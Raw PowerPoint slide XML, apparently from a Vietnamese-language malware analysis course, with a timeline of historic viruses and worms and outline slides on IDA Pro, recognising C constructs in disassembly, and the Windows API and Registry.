          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>1974, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0"/>
              <a:t>Wabbit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>A self-replicating program </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
              <a:t>copied itself until </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>it bogs down the system </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>1982, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0"/>
              <a:t>Elk Cloner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>: Written by a 15-year-old, Elk Cloner is one of the earliest widespread, self-replicating viruses to affect personal computers. </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0"/>
              <a:t>1986, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>Fred Cohen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Coined the term “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>virus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
              <a:t>” in his </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>Ph.D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
              <a:t> thesis.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>1986 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0"/>
              <a:t>–  Brain Boot Sector Virus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>Generally regarded as the first virus to infect MS-DOS computers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0"/>
              <a:t>1986 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>, PC-Write </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0"/>
              <a:t>Trojan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>earliest Trojans as a popular shareware program called “PC-Writer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
              <a:t>.”. It </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>would erase all of a user’s files.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>1988, Morris </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0"/>
              <a:t>Worm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
              <a:t>infected </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>a substantial percentage of computers connected to ARPANET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
              <a:t>, bringing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>the network </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
              <a:t>down within </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>24 hours. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>1991, Michelangelo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0"/>
              <a:t>Virus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
              <a:t>was </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>designed to erase information from hard drives on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>March 6th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>, the birthday of the famed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Renaissance artist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Impacted </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>about 10,000 systems, but the hype significantly raised public awareness of computer viruses.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>1999, Melissa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0"/>
              <a:t>Virus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>first mass-emailed virus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
              <a:t>utilized Outlook </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>address books from infected machines, and mailed itself to 50 people at a time.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="398734420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Change code on disassembly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>IDAPro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>cho</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>phép</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>đổi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>mã</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>sau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>khi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>đã</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> disassembly </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>và</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>chạy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>lại</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>chương</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>trình</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Thay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>đổi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>địa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>chỉ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> ô </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>nhớ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Bổ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> sung </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>ghi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>chú</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Thay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>đổi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>định</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>dạng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>của</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>toán</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>hạng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: decimal, binary, hex</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Sử</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>dụng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> name constant</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Định</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>nghĩa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>lại</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>và</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> data</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="653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err="1" smtClean="0"/>
              <a:t>Mở</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>rộng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>chức</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>năng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>với</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> Plug-in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>IDC script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Python script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Mua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>bản</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>quyền</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17675003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Nhận</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>diện</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>cấu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>trúc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>của</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>chương</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>trình</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> C</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Biến</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>cục</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>bộ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>toàn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>cục</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Toán</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>tử</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> ++, --, %</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Câu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>điều</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>kiện</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0"/>
              <a:t>if</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Vòng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>lặp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0"/>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0"/>
              <a:t>while</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Câu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>lệnh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0"/>
              <a:t>switch</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Khai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>báo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0"/>
              <a:t>Array, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Structs</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33374225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Phân</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>tích</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>mã</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>độc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> CT Windows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Windows API</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Windows Registry</a:t>
            </a:r>
          </a:p>
          <a:p>
